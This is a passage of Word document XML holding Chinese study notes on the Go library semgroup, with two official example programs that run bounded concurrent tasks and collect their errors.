    <w:p w14:paraId="65A2DA2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang.org/x/sync/errgroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同，它不会返回第一个非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误，而是会累积所有错误并返回一组错误，从而允许每个任务完成其任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398FF3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F84898D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本可以理解为，就是用来跑多线的，但是不像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原生多线那么没有控制，这里会控制最大运行的线程数量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D9726" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABC7E19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E5122" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBB6D34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A593471" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3D90A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E2C942" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"context"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4FAF1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD9F9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E106BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"github.com/fatih/semgroup"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CBEC5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32373048" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A44101A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A7608" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>const maxWorkers = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FF00C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>s := semgroup.NewGroup(context.Background(), maxWorkers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD8D1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74AB5B90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>visitors := []int{5, 2, 10, 8, 9, 3, 1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE48ED5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务队列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17487466" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A619A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>for _, v := range visitors {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C325EF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>v := v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637271B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38814BAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> s.Go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>直接仿照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>协程语句跑多线</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53410FA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.Go(func() error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0202516A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("Visits: ", v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9F785" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69998301" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:tab/>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143BE77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEB3CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0674676A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Wait for all visits to complete. Any errors are accumulated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAFF9DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">if err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>s.Wait()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>; err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C118182" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A21320" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C45D42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223A9461" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B1A31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Visits: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E08922F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Visits: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DCDA61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Visits: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B2BC1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Visits: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE78E8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Visits: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D54DE9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Visits: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BECFEC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Visits: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF71F04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6DA68F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259B8814" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC02FB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F3987D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DA371" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"context"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3EA16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"errors"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48982522" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD56CB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B8300D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"github.com/fatih/semgroup"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A182375" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B153D50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DDD8A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CCD65C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>const maxWorkers = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48458A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>s := semgroup.NewGroup(context.Background(), maxWorkers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A088DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AF6CEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>visitors := []int{1, 1, 1, 1, 2, 2, 1, 1, 2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3072F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00676162" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, v := range visitors {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F8EC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>v := v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4EED1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>s.Go(func() error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAA8233" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if v != 1 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151CC5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return errors.New("only one visitor is allowed")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A198557" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D4321" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
